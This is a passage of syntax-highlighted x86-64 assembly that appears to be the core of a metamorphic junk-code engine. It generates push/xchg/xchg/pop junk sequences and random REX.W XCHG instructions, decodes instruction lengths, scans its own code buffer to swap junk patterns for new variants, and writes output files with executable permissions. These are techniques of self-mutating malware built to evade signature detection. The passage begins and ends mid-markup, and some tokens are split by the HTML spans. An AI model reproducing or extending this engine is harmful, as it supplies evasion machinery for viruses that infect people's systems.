class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">7</span><span class="p">],</span> <span class="mh">0xC3</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">8</span><span class="p">],</span> <span class="mh">0x5B</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">9</span><span class="p">],</span> <span class="mh">0x58</span> <span class="nf">jmp</span> <span class="nv">.done</span> <span class="nl">.variant_1:</span> <span class="c1">; push rcx,rdx; xchg rcx,rdx; xchg rcx,rdx; pop rdx,rcx</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="p">],</span> <span class="mh">0x51</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">1</span><span class="p">],</span> <span class="mh">0x52</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">2</span><span class="p">],</span> <span class="mh">0x48</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">3</span><span class="p">],</span> <span class="mh">0x87</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">4</span><span class="p">],</span> <span class="mh">0xCA</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">5</span><span class="p">],</span> <span class="mh">0x48</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">6</span><span class="p">],</span> <span class="mh">0x87</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">7</span><span class="p">],</span> <span class="mh">0xCA</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">8</span><span class="p">],</span> <span class="mh">0x5A</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">9</span><span class="p">],</span> <span class="mh">0x59</span> <span class="nf">jmp</span> <span class="nv">.done</span> <span class="nl">.variant_2:</span> <span class="c1">; push rax,rcx; xchg rax,rcx; xchg rax,rcx; pop rcx,rax</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="p">],</span> <span class="mh">0x50</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">1</span><span class="p">],</span> <span class="mh">0x51</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">2</span><span class="p">],</span> <span class="mh">0x48</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">3</span><span class="p">],</span> <span class="mh">0x87</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">4</span><span class="p">],</span> <span class="mh">0xC1</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">5</span><span class="p">],</span> <span class="mh">0x48</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">6</span><span class="p">],</span> <span class="mh">0x87</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">7</span><span class="p">],</span> <span class="mh">0xC1</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">8</span><span class="p">],</span> <span class="mh">0x59</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">9</span><span class="p">],</span> <span class="mh">0x58</span> <span class="nf">jmp</span> <span class="nv">.done</span> <span class="nl">.variant_3:</span> <span class="c1">; push rbx,rdx; xchg rbx,rdx; xchg rbx,rdx; pop rdx,rbx</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="p">],</span> <span class="mh">0x53</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">1</span><span class="p">],</span> <span class="mh">0x52</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">2</span><span class="p">],</span> <span class="mh">0x48</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">3</span><span class="p">],</span> <span class="mh">0x87</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">4</span><span class="p">],</span> <span class="mh">0xD3</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">5</span><span class="p">],</span> <span class="mh">0x48</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">6</span><span class="p">],</span> <span class="mh">0x87</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">7</span><span class="p">],</span> <span class="mh">0xD3</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">8</span><span class="p">],</span> <span class="mh">0x5A</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">9</span><span class="p">],</span> <span class="mh">0x5B</span> <span class="nl">.done:</span> <span class="nf">pop</span> <span class="nv">r8</span> <span class="nf">pop</span> <span class="nb">rdx</span> <span class="nf">pop</span> <span class="nb">rcx</span> <span class="nf">pop</span> <span class="nb">rbx</span> <span class="nf">ret</span> <span class="c1">; file I/O</span> <span class="nl">read_f:</span> <span class="nf">push</span> <span class="nv">r12</span> <span class="nf">push</span> <span class="nv">r13</span> <span class="nf">push</span> <span class="nv">r14</span> <span class="nf">push</span> <span class="nv">r15</span> <span class="nf">mov</span> <span class="nv">r15</span><span class="p">,</span> <span class="nb">rsi</span> <span class="c1">; save buffer pointer</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">SYS_open</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">O_RDONLY</span> <span class="nf">xor</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nb">rdx</span> <span class="nf">syscall</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">js</span> <span class="nv">.error</span> <span class="nf">mov</span> <span class="nv">r12</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">SYS_fstat</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">r12</span> <span class="nf">sub</span> <span class="nb">rsp</span><span class="p">,</span> <span class="mi">144</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rsp</span> <span class="nf">syscall</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">js</span> <span class="nv">.close_e</span> <span class="nf">mov</span> <span class="nv">r13</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsp</span> <span class="o">+</span> <span class="mi">48</span><span class="p">]</span> <span class="c1">; file size from stat</span> <span class="nf">add</span> <span class="nb">rsp</span><span class="p">,</span> <span class="mi">144</span> <span class="c1">; bounds check</span> <span class="nf">cmp</span> <span class="nv">r13</span><span class="p">,</span> <span class="mi">65536</span> <span class="nf">jle</span> <span class="nv">.size_ok</span> <span class="nf">mov</span> <span class="nv">r13</span><span class="p">,</span> <span class="mi">65536</span> <span class="nl">.size_ok:</span> <span class="nf">test</span> <span class="nv">r13</span><span class="p">,</span> <span class="nv">r13</span> <span class="nf">jz</span> <span class="nv">.empty</span> <span class="nf">xor</span> <span class="nv">r14</span><span class="p">,</span> <span class="nv">r14</span> <span class="c1">; bytes read cnt</span> <span class="nl">.read_loop:</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">SYS_read</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">r12</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">r15</span> <span class="nf">add</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">r14</span> <span class="c1">; offset into buffer</span> <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nv">r13</span> <span class="nf">sub</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nv">r14</span> <span class="c1">; remaining bytes to read</span> <span class="nf">jz</span> <span class="nv">.read_done</span> <span class="nf">syscall</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jle</span> <span class="nv">.read_done</span> <span class="c1">; EOF or error</span> <span class="nf">add</span> <span class="nv">r14</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">cmp</span> <span class="nv">r14</span><span class="p">,</span> <span class="nv">r13</span> <span class="nf">jl</span> <span class="nv">.read_loop</span> <span class="nl">.read_done:</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">SYS_close</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">r12</span> <span class="nf">syscall</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">r14</span> <span class="c1">; return bytes read</span> <span class="nf">jmp</span> <span class="nv">.done</span> <span class="nl">.empty:</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">SYS_close</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">r12</span> <span class="nf">syscall</span> <span class="nf">xor</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nl">.done:</span> <span class="nf">pop</span> <span class="nv">r15</span> <span class="nf">pop</span> <span class="nv">r14</span> <span class="nf">pop</span> <span class="nv">r13</span> <span class="nf">pop</span> <span class="nv">r12</span> <span class="nf">ret</span> <span class="nl">.close_e:</span> <span class="nf">add</span> <span class="nb">rsp</span><span class="p">,</span> <span class="mi">144</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">SYS_close</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">r12</span> <span class="nf">syscall</span> <span class="nl">.error:</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span> <span class="nf">pop</span> <span class="nv">r15</span> <span class="nf">pop</span> <span class="nv">r14</span> <span class="nf">pop</span> <span class="nv">r13</span> <span class="nf">pop</span> <span class="nv">r12</span> <span class="nf">ret</span> <span class="nl">write_f:</span> <span class="nf">push</span> <span class="nb">rbp</span> <span class="nf">mov</span> <span class="nb">rbp</span><span class="p">,</span> <span class="nb">rsp</span> <span class="nf">push</span> <span class="nv">r12</span> <span class="nf">push</span> <span class="nv">r13</span> <span class="nf">push</span> <span class="nv">r14</span> <span class="nf">push</span> <span class="nv">r15</span> <span class="nf">mov</span> <span class="nv">r12</span><span class="p">,</span> <span class="nb">rdi</span> <span class="c1">; filename</span> <span class="nf">mov</span> <span class="nv">r13</span><span class="p">,</span> <span class="nb">rsi</span> <span class="c1">; buffer</span> <span class="nf">mov</span> <span class="nv">r14</span><span class="p">,</span> <span class="nb">rdx</span> <span class="c1">; size</span> <span class="c1">; validate inputs</span> <span class="nf">test</span> <span class="nv">r12</span><span class="p">,</span> <span class="nv">r12</span> <span class="nf">jz</span> <span class="nv">.write_er</span> <span class="nf">test</span> <span class="nv">r13</span><span class="p">,</span> <span class="nv">r13</span> <span class="nf">jz</span> <span class="nv">.write_er</span> <span class="nf">test</span> <span class="nv">r14</span><span class="p">,</span> <span class="nv">r14</span> <span class="nf">jz</span> <span class="nv">.write_s</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">r12</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">O_WRONLY</span> <span class="o">|</span> <span class="nv">O_CREAT</span> <span class="o">|</span> <span class="nv">O_TRUNC</span> <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="mi">0755</span><span class="nv">o</span> <span class="nf">call</span> <span class="nv">sys_open</span> <span class="nf">cmp</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">0</span> <span class="nf">jl</span> <span class="nv">.write_er</span> <span class="nf">mov</span> <span class="nv">r12</span><span class="p">,</span> <span class="nb">rax</span> <span class="c1">; fd</span> <span class="nf">xor</span> <span class="nv">r15</span><span class="p">,</span> <span class="nv">r15</span> <span class="c1">; bytes written cnt</span> <span class="nl">.write_lp:</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">r12</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">r13</span> <span class="nf">add</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">r15</span> <span class="c1">; offset into buffer</span> <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nv">r14</span> <span class="nf">sub</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nv">r15</span> <span class="c1">; remaining bytes</span> <span class="nf">jz</span> <span class="nv">.write_c</span> <span class="nf">call</span> <span class="nv">sys_write</span> <span class="nf">JUNK</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jle</span> <span class="nv">.r_close</span> <span class="nf">add</span> <span class="nv">r15</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">cmp</span> <span class="nv">r15</span><span class="p">,</span> <span class="nv">r14</span> <span class="nf">jl</span> <span class="nv">.write_lp</span> <span class="nl">.write_c:</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">r12</span> <span class="nf">call</span> <span class="nv">sys_close</span> <span class="nl">.write_s:</span> <span class="nf">xor</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="c1">; success</span> <span class="nf">pop</span> <span class="nv">r15</span> <span class="nf">pop</span> <span class="nv">r14</span> <span class="nf">pop</span> <span class="nv">r13</span> <span class="nf">pop</span> <span class="nv">r12</span> <span class="nf">pop</span> <span class="nb">rbp</span> <span class="nf">ret</span> <span class="nl">.r_close:</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">r12</span> <span class="nf">call</span> <span class="nv">sys_close</span> <span class="nl">.write_er:</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span> <span class="nf">pop</span> <span class="nv">r15</span> <span class="nf">pop</span> <span class="nv">r14</span> <span class="nf">pop</span> <span class="nv">r13</span> <span class="nf">pop</span> <span class="nv">r12</span> <span class="nf">pop</span> <span class="nb">rbp</span> <span class="nf">ret</span> <span class="c1">; instruction generator</span> <span class="nl">trace_op:</span> <span class="c1">; bounds check</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nv">codelen</span><span class="p">]</span> <span class="nf">cmp</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jae</span> <span class="nv">.bounds_er</span> <span class="nf">mov</span> <span class="nv">r8</span><span class="p">,</span> <span class="nv">code</span> <span class="nf">add</span> <span class="nv">r8</span><span class="p">,</span> <span class="nb">rsi</span> <span class="c1">; instruction size check</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nv">codelen</span><span class="p">]</span> <span class="nf">sub</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rsi</span> <span class="nf">cmp</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">3</span> <span class="nf">jae</span> <span class="nv">.rex_xchg</span> <span class="nf">cmp</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">2</span> <span class="nf">jae</span> <span class="nv">.write_prefix</span> <span class="nf">cmp</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">1</span> <span class="nf">jae</span> <span class="nv">.write_nop</span> <span class="nl">.bounds_er:</span> <span class="nf">xor</span> <span class="nb">eax</span><span class="p">,</span> <span class="nb">eax</span> <span class="nf">ret</span> <span class="nl">.write_nop:</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="p">],</span> <span class="nv">NOP</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="mi">1</span> <span class="nf">ret</span> <span class="nl">.write_prefix:</span> <span class="c1">; validate register (0-3 only)</span> <span class="nf">cmp</span> <span class="nb">di</span><span class="nv">l</span><span class="p">,</span> <span class="mi">3</span> <span class="nf">ja</span> <span class="nv">.bounds_er</span> <span class="nf">call</span> <span class="nv">get_random</span> <span class="nf">and</span> <span class="nb">eax</span><span class="p">,</span> <span class="mi">5</span> <span class="nf">movzx</span> <span class="nb">eax</span><span class="p">,</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">prefixes</span> <span class="o">+</span> <span class="nb">rax</span><span class="p">]</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">r8</span><span class="p">],</span> <span class="nb">al</span> <span class="nf">call</span> <span class="nv">get_random</span> <span class="nf">and</span> <span class="nb">eax</span><span class="p">,</span> <span class="mi">3</span> <span class="c1">; rax,rbx,rcx,rdx only</span> <span class="nf">shl</span> <span class="nb">eax</span><span class="p">,</span> <span class="mi">3</span> <span class="nf">add</span> <span class="nb">eax</span><span class="p">,</span> <span class="mh">0xC0</span> <span class="nf">add</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">di</span><span class="nv">l</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">r8</span> <span class="o">+</span> <span class="mi">1</span><span class="p">],</span> <span class="nb">al</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="mi">2</span> <span class="nf">ret</span> <span class="nl">.rex_xchg:</span> <span class="c1">; generate REX.W XCHG</span> <span class="nf">cmp</span> <span class="nb">di</span><span class="nv">l</span><span class="p">,</span> <span class="mi">3</span> <span class="nf">ja</span> <span class="nv">.bounds_er</span> <span class="c1">; get different register</span> <span class="nf">call</span> <span class="nv">get_random</span> <span class="nf">and</span> <span class="nb">eax</span><span class="p">,</span> <span class="mi">3</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">di</span><span class="nv">l</span> <span class="nf">je</span> <span class="nv">.rex_xchg</span> <span class="c1">; retry if same</span> <span class="c1">; build REX.W XCHG r1, r2</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="p">],</span> <span class="nv">REX_W</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span> <span class="o">+</span> <span class="mi">1</span><span class="p">],</span> <span class="nv">XCHG_OP</span> <span class="c1">; ModR/M byte</span> <span class="nf">mov</span> <span class="nb">bl</span><span class="p">,</span> <span class="nv">XCHG_BASE</span> <span class="nf">mov</span> <span class="nb">cl</span><span class="p">,</span> <span class="nb">al</span> <span class="nf">shl</span> <span class="nb">cl</span><span class="p">,</span> <span class="mi">3</span> <span class="nf">add</span> <span class="nb">bl</span><span class="p">,</span> <span class="nb">cl</span> <span class="nf">add</span> <span class="nb">bl</span><span class="p">,</span> <span class="nb">di</span><span class="nv">l</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">r8</span> <span class="o">+</span> <span class="mi">2</span><span class="p">],</span> <span class="nb">bl</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="mi">3</span> <span class="nf">ret</span> <span class="c1">; instruction decoder</span> <span class="nl">trace_jmp:</span> <span class="nf">push</span> <span class="nb">rbx</span> <span class="nf">push</span> <span class="nb">rcx</span> <span class="nf">cmp</span> <span class="nb">rsi</span><span class="p">,</span> <span class="p">[</span><span class="nv">codelen</span><span class="p">]</span> <span class="nf">jae</span> <span class="nv">.invalid</span> <span class="nf">mov</span> <span class="nv">r8</span><span class="p">,</span> <span class="nv">code</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nv">r8</span> <span class="o">+</span> <span class="nb">rsi</span><span class="p">]</span> <span class="c1">; check for NOP</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">NOP</span> <span class="nf">je</span> <span class="nv">.ret_1</span> <span class="c1">; check MOV+reg</span> <span class="nf">mov</span> <span class="nb">bl</span><span class="p">,</span> <span class="nv">MOV</span> <span class="nf">add</span> <span class="nb">bl</span><span class="p">,</span> <span class="nb">di</span><span class="nv">l</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">bl</span> <span class="nf">je</span> <span class="nv">.ret_5</span> <span class="c1">; check prefix instruction</span> <span class="nf">mov</span> <span class="nb">rbx</span><span class="p">,</span> <span class="nv">prefixes</span> <span class="nl">.check_prefix:</span> <span class="nf">mov</span> <span class="nb">cl</span><span class="p">,</span> <span class="p">[</span><span class="nb">rbx</span><span class="p">]</span> <span class="nf">test</span> <span class="nb">cl</span><span class="p">,</span> <span class="nb">cl</span> <span class="nf">jz</span> <span class="nv">.invalid</span> <span class="nf">cmp</span> <span class="nb">cl</span><span class="p">,</span> <span class="nb">al</span> <span class="nf">je</span> <span class="nv">.check_second_byte</span> <span class="nf">inc</span> <span class="nb">rbx</span> <span class="nf">jmp</span> <span class="nv">.check_prefix</span> <span class="nl">.check_second_byte:</span> <span class="nf">inc</span> <span class="nb">rsi</span> <span class="nf">cmp</span> <span class="nb">rsi</span><span class="p">,</span> <span class="p">[</span><span class="nv">codelen</span><span class="p">]</span> <span class="nf">jae</span> <span class="nv">.invalid</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nv">r8</span> <span class="o">+</span> <span class="nb">rsi</span><span class="p">]</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC0</span> <span class="nf">jb</span> <span class="nv">.invalid</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xFF</span> <span class="nf">ja</span> <span class="nv">.invalid</span> <span class="nf">and</span> <span class="nb">al</span><span class="p">,</span> <span class="mi">7</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">di</span><span class="nv">l</span> <span class="nf">jne</span> <span class="nv">.invalid</span> <span class="nl">.ret_2:</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="mi">2</span> <span class="nf">jmp</span> <span class="nv">.done</span> <span class="nl">.ret_1:</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="mi">1</span> <span class="nf">jmp</span> <span class="nv">.done</span> <span class="nl">.ret_5:</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="mi">5</span> <span class="nf">jmp</span> <span class="nv">.done</span> <span class="nl">.invalid:</span> <span class="nf">xor</span> <span class="nb">eax</span><span class="p">,</span> <span class="nb">eax</span> <span class="nl">.done:</span> <span class="nf">pop</span> <span class="nb">rcx</span> <span class="nf">pop</span> <span class="nb">rbx</span> <span class="nf">ret</span> <span class="c1">; junk mutation engine</span> <span class="nl">replace_junk:</span> <span class="nf">push</span> <span class="nv">r12</span> <span class="nf">push</span> <span class="nv">r13</span> <span class="nf">push</span> <span class="nv">r14</span> <span class="nf">push</span> <span class="nv">r15</span> <span class="nf">mov</span> <span class="nv">r8</span><span class="p">,</span> <span class="p">[</span><span class="nv">codelen</span><span class="p">]</span> <span class="nf">test</span> <span class="nv">r8</span><span class="p">,</span> <span class="nv">r8</span> <span class="nf">jz</span> <span class="nv">.done</span> <span class="nf">cmp</span> <span class="nv">r8</span><span class="p">,</span> <span class="nv">JUNKLEN</span> <span class="nf">jle</span> <span class="nv">.done</span> <span class="nf">sub</span> <span class="nv">r8</span><span class="p">,</span> <span class="nv">JUNKLEN</span> <span class="nf">mov</span> <span class="nv">r9</span><span class="p">,</span> <span class="nv">code</span> <span class="nf">xor</span> <span class="nv">r12</span><span class="p">,</span> <span class="nv">r12</span> <span class="nl">.scan_loop:</span> <span class="nf">cmp</span> <span class="nv">r12</span><span class="p">,</span> <span class="nv">r8</span> <span class="nf">jae</span> <span class="nv">.done</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nv">codelen</span><span class="p">]</span> <span class="nf">cmp</span> <span class="nv">r12</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jae</span> <span class="nv">.done</span> <span class="c1">; scan for junk pattern</span> <span class="nf">movzx</span> <span class="nb">eax</span><span class="p">,</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r9</span> <span class="o">+</span> <span class="nv">r12</span><span class="p">]</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">PUSH</span> <span class="nf">jb</span> <span class="nv">.next_i</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">PUSH</span> <span class="o">+</span> <span class="mi">3</span> <span class="c1">; rax,rbx,rcx,rdx only</span> <span class="nf">ja</span> <span class="nv">.next_i</span> <span class="c1">; second byte must be PUSH</span> <span class="nf">movzx</span> <span class="nb">ebx</span><span class="p">,</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r9</span> <span class="o">+</span> <span class="nv">r12</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="nf">cmp</span> <span class="nb">bl</span><span class="p">,</span> <span class="nv">PUSH</span> <span class="nf">jb</span> <span class="nv">.next_i</span> <span class="nf">cmp</span> <span class="nb">bl</span><span class="p">,</span> <span class="nv">PUSH</span> <span class="o">+</span> <span class="mi">3</span> <span class="nf">ja</span> <span class="nv">.next_i</span> <span class="c1">; check REX.W prefix</span> <span class="nf">cmp</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r9</span> <span class="o">+</span> <span class="nv">r12</span> <span class="o">+</span> <span class="mi">2</span><span class="p">],</span> <span class="nv">REX_W</span> <span class="nf">jne</span> <span class="nv">.next_i</span> <span class="c1">; check XCHG opcode</span> <span class="nf">cmp</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r9</span> <span class="o">+</span> <span class="nv">r12</span> <span class="o">+</span> <span class="mi">3</span><span class="p">],</span> <span class="nv">XCHG_OP</span> <span class="nf">jne</span> <span class="nv">.next_i</span> <span class="c1">; validate complete sequence</span> <span class="nf">call</span> <span class="nv">validate</span> <span class="nf">test</span> <span class="nb">eax</span><span class="p">,</span> <span class="nb">eax</span> <span class="nf">jz</span> <span class="nv">.next_i</span> <span class="c1">; replace with new junk</span> <span class="nf">call</span> <span class="nv">insert</span> <span class="nl">.next_i:</span> <span class="nf">inc</span> <span class="nv">r12</span> <span class="nf">jmp</span> <span class="nv">.scan_loop</span> <span class="nl">.done:</span> <span class="nf">pop</span> <span class="nv">r15</span> <span class="nf">pop</span> <span class="nv">r14</span> <span class="nf">pop</span> <span class="nv">r13</span> <span class="nf">pop</span> <span class="nv">r12</span> <span class="nf">ret</span> <span class="c1">; validate junk pattern</span> <span class="nl">validate:</span> <span class="nf">push</span> <span class="nb">rbx</span> <span class="nf">push</span> <span class="nb">rcx</span> <span class="c1">; extract registers from PUSH</span> <span class="nf">movzx</span> <span class="nb">eax</span><span class="p">,</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r9</span> <span class="o">+</span> <span class="nv">r12</span><span class="p">]</span> <span class="nf">sub</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">PUSH</span> <span class="nf">mov</span> <span class="nb">bl</span><span class="p">,</span> <span class="nb">al</span> <span class="c1">; reg1</span> <span class="nf">movzx</span> <span class="nb">eax</span><span class="p">,</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r9</span> <span class="o">+</span> <span class="nv">r12</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="nf">sub</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">PUSH</span> <span class="nf">mov</span> <span class="nb">cl</span><span class="p">,</span> <span class="nb">al</span> <span class="c1">; reg2</span> <span class="c1">; registers must differ</span> <span class="nf">cmp</span> <span class="nb">bl</span><span class="p">,</span> <span class="nb">cl</span> <span class="nf">je</span> <span class="nv">.invalid</span> <span class="c1">; check POP sequence (reversed)</span> <span class="nf">movzx</span> <span class="nb">eax</span><span class="p">,</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r9</span> <span class="o">+</span> <span class="nv">r12</span> <span class="o">+</span> <span class="mi">8</span><span class="p">]</span> <span class="nf">sub</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">POP</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">cl</span> <span class="nf">jne</span> <span class="nv">.invalid</span> <span class="nf">movzx</span> <span class="nb">eax</span><span class="p">,</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r9</span> <span class="o">+</span> <span class="nv">r12</span> <span class="o">+</span> <span class="mi">9</span><span 